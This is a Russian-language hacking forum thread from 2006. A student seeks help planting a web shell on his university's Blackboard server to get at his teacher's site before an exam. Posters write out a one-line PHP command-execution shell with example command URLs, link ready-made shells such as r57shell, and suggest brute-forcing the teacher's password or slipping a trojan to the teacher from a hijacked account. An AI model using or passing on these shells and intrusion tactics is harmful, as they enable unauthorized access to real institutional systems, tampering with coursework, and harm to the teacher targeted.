Сайт университета

Discussion in 'Уязвимости' started by alex-19841, 31 Mar 2006.

  1. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    Учитель имеет сайт на серваке университета. У каждого ученика на сайте университета (не учителя) свой экяунт.
    Через этот экяунт мы можем повылать ЛЮБЫЕ файлы учителю. Но когда посылаешь файл то учитель видет от кого он пришел. Также можно хранить на сервере файлы.
    Я пробовал залить на сервер файл r57shell.php - он его не берет, видимо потамучто файл много занимет.
    Также пробовал залить самодельный шелл shell.php
    в нем:
    <? system($_GET[c]); ?>
    Он его взял залил в ../upload/_3456/shell.php мне на моем экяунте показал ссылку этого файла. Я кликаю на ссылку то мне на белом окне вылетает
    <? system($_GET[c]); ?>
    Причем когда копируешь эту ссылку файла в буфер потом встовзяешь в internet explorer то те пишут ACCESS Denied.
    "Назад к учителю" У него сайт простой из html никаких скриптов.
    Мой вопрос у кого есть какие идеи чтоб туда шелл залить. Просто экламен через ниделю.
    Извините но полный адрес сайта учителя дать не могу.
    Да ща только что пробывал залить эту вышеперечисленую шеллу на другой провереный сервак то просто выпадает пустой скрин.
    Зарание спасибо.
     
    #1 alex-19841, 31 Mar 2006
    Last edited: 31 Mar 2006
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
  3. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Ты уверен что на серваке есть поддержка Php?
     
  4. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    а по твоему ) как оно тогда залило?)
     
    _________________________
  5. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Через html можно тоже заливать.
     
  6. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Прикольно сказал
     
  7. koi8-r

    koi8-r Banned

    Joined:
    2 Mar 2006
    Messages:
    56
    Likes Received:
    3
    Reputations:
    -7
    попробуй брутом пас угнать или трояном который можно впарить преподу и не со своего аккаунта. как вариант с забрученого аккаунта своего врага...
     
  8. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    Попробуй вот так:

    <?php system($_GET['c']); ?>

    Пример использования (для винды) => xttp://site/shell.php?c=dir
     
    1 person likes this.
  9. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Ыыы, поспешил=)) прочитал только что r57shell.php не залился, до конца не дочитав пост=(
     
  10. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Вроде бы доступ ограничен.
     
    #10 Tem, 1 Apr 2006
    Last edited: 1 Apr 2006
  11. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    Я попробовал туда свою "upload" форму залить, но у меня форма состоит из двух файлов "index.html" и "upload.pl" два файла залились нормально но когда начал заливать свой шелл через свою форму то получил вот такую ошибку

    HTTP Status 404 - /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

    --------------------------------------------------------------------------------

    type Status report

    message /courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

    description The requested resource (/courses/1/CIS-121-emaxson/uploads/_136251_1/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl) is not available.

    т.е говорит что upload.pl в той папке нету.
    но когда открываю вот так
    hxxp://сайт.edu/courses/1/CIS-121-emaxson/uploads/_136248_1/upload.pl

    то он там :(

    Вот моя upload форма
    http://rapidshare.de/files/17066204/uploader.rar.html

    Может у кого есть upload форма одним файлом, а не двумя?
     
    #11 alex-19841, 3 Apr 2006
    Last edited: 3 Apr 2006
  12. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    Тоже ниче не показывает кроме <?php system($_GET['c']); ?>
     
  13. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Да? странно... ну попробуй тогда написать там "123" - я уверен, покажет "123" !
    Попробуй 12345qwe - покажет 12345qwe...
    Павел Глоба предсказывает что у тебя не стоит пхп...
     
  14. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    А на html шелла случайно ни укого нету?
     
    #14 alex-19841, 3 Apr 2006
    Last edited: 3 Apr 2006
  15. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    ее................................................ нет...................................

    -------------------------------

    кстати вариант... НО ИМХО врятле прокатит.
     
    #15 A110ut, 3 Apr 2006
    Last edited: 3 Apr 2006
  16. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
  17. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    EST a1ien
    Спасибо за шелл - переименовал её в .pl, залил таже история сервак открывает ее как в блокноте. :(
    В этой шеле надо же еще знать адрес перла не серваке.

    "Измените первую сроку скрипта "/usr/bin/perl" на корректный путь к интерпритатору перла на Вашем сервере."

    А как его узнать?
     
    #17 alex-19841, 3 Apr 2006
    Last edited: 3 Apr 2006
  18. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Попробуй залей локальный файл. Если прочитает, легче по исходникам будет...
     
  19. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    ИМХО мона сливать воду. Читай пост КЕЗа, только "пхп" замени на "перл"
     
  20. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    Я ща толь что се на сервак залил shell.php и shell.pl в которых в нутри только <?php system($_GET['c']); ?> и все больше никаких тагов нет.
    Пробовал
    hццp://www.xxx.com/shell.php?c=id
    или
    hццp://www.xxx.com/shell.php&c=id
    или
    xttp://site/shell.php?c=dir
    или
    hццp://www.xxx.com/shell.pl?c=id
    или
    hццp://www.xxx.com/shell.pl&c=id
    или
    xttp://site/shell.pl?c=dir

    Получаю пустой экран :(, при этом мой сервак поддерживает PHP и R57shell.php там работает нормально.
    Вот в общем файл который заливаю.
    http://rapidshare.de/files/17160217/shell.php.html

    Сам сервак университета должен есть перл потамучто
    webapps/portal/frameset.jsp?tab=courses&url=/bin/common/course.pl?course_id=_553_1
    Только как узнать адресс перла на серваке?
    Чтоб работала http://rst.void.ru/download/r57pws.txt

    Сайт университета стоит на движке "Powered by Blackboard'"
     
    #20 alex-19841, 4 Apr 2006
    Last edited: 4 Apr 2006